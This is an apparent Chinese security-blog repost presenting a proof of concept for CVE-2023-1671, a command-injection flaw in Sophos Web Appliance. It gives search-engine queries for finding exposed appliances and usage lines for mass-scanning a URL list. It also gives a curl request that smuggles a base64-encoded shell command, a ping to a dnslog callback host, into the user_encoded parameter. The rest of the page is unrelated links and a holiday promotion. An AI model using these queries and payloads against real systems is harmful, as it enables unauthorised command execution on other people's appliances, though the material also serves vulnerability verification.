2023年4月26日15:09:42评论152 views字数 1088阅读3分37秒阅读模式

fofa

(title="Sophos Web Appliance" || app="Sophos-Web-Appliance") && title!="Sophos Web Appliance：错误请求"

ZoomEye

title:"Sophos Web Appliance"-title:"Sophos Web Appliance: Forbidden"-title:"Sophos Web Appliance: Bad Request"

Shodan

title:"Sophos Web Appliance"

Usage

python CVE-2023-1671-POC.py -u http://www.example.compython CVE-2023-1671-POC.py -u http://www.example.com -d xxxxxx.dnslog.cn
python CVE-2023-1671-POC.py -f urls.txtpython CVE-2023-1671-POC.py -f urls.txt -d xxxxxx.dnslog.cn

or without this script file:

echo -n "';ping xxxxx.dnslog.cn -c 3 #" | base64# JztwaW5nIHh4eHh4LmRuc2xvZy5jbiAtYyAzICM=  --> JztwaW5nIHh4eHh4LmRuc2xvZy5jbiAtYyAzICMcurl -k --trace-ascii % "http://www.example.com/index.php?c=blocked&action=continue" -d "args_reason=filetypewarn&url=12345&filetype=12345&user=12345&user_encoded=JztwaW5nIHh4eHh4LmRuc2xvZy5jbiAtYyAzICM"

Reference

https://vulncheck.com/blog/cve-2023-1671-analysis

项目地址：https://github.com/W01fh4cker/CVE-2023-1671-POC

CVE-2023-1671-POC，基于dnslog平台

（五一）夏季消费节

国际劳动节又称“五一国际劳动节”“国际示威游行日”（英语：International Workers' Day，May Day），是世界上80多个国家的全国性节日。定在每年的五月一日。它是全世界劳动人民共同拥有的节日" 夏日消费节 ",进一步促进消费,助力实体。

原文始发于微信公众号（Ots安全）：CVE-2023-1671-POC，基于dnslog平台

左青龙
微信扫一扫

右白虎
微信扫一扫

CVE-2023-1671-POC，基于dnslog平台

fofa

ZoomEye

Shodan

Usage

or without this script file:

Reference

深入剖析：如何使用Pulsar和Arthas高效排查消息队列延迟问题

【2024HW】|4-蓝队面试题

最新H1越权漏洞披露，获得15000美元奖励

某次小红书帮助下的Edu挖掘

实战 | 参数走私导致的权限绕过

观点 | 视频生成人工智能Sora的法律问题研究

HowIHackedMyCar 2021款现代IONIQ （二） Making a Backdoor

记一次内网渗透2

如何在渗透测试面试中解释/Kerberos

安全态势管理的要素

发表评论

在线咨询

微信